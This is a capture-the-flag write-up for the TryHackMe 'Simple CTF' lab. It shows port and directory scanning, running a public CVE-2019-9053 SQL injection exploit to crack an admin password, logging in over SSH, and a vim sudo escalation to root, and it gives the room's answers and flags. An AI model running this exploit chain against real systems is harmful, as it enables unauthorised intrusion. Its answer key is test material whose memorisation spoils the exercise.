Simple CTF

THM Simple CTF

How many services are running under port 1000?

nmap -sV 10.82.188.38
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
21/tcp   open  tcpwrapped
80/tcp   open  tcpwrapped
2222/tcp open  tcpwrapped

Answer 2

What is running on the higher port?

Answer ssh

What's the CVE you're using against the application?

Lets try scannignt he host for any common exploits found with the vuln script

nmap -sV --script vuln 10.82.188.38

Looks like nothing was found, maybe there is a hidden directory with an upload or form we can explot

gobuster dir -u 10.82.188.38 -w /usr/share/wordlists/dirb/common.txt  -x php,html,js,txt,asp,aspx,jsp
/robots.txt           (Status: 200) [Size: 929]
/simple               (Status: 301) [Size: 313] [--> http://10.82.188.38/simple/]

It looks like theres CMS made simple 2.2.8 on /simple/, we can likely use the reported SQL injection exploit reported in CVE: 2019-9053. There is also the name mike in robots.txt

Answer CVE-2019-9053

To what kind of vulnerability is the application vulnerable?

Answer sqli

What's the password?

git clone https://github.com/Perseus99999/CVE-2019-9053-working-.git
cd CVE-2019-9053-working-
python3 exploit.py -u http://10.82.188.38/simple/ --crack -w /usr/share/wordlists/rockyou.txt

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret

Answer secret

Where can you login with the details obtained?

Looking at the page there is a button to take you to the admin login page which you can login to but you can also login via ssh

ssh -p 2222 mitch@10.82.188.38

Answer ssh

What's the user flag?

cat ./user.txt

Answer G00d j0b, keep up!

Is there any other user in the home directory? What's its name?

ls /home

Answer sunbath

What can you leverage to spawn a privileged shell?

sudo -ll

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
    /usr/bin/vim

It looks like we can use vim as root, lets check GTFOBins for an exploit

sudo vim -c ':!/bin/sh'
whoami ; id

root
uid=0(root) gid=0(root) groups=0(root)

Answer vim

What's the root flag?

cat /root/root.txt

Answer W3ll d0n3. You made it!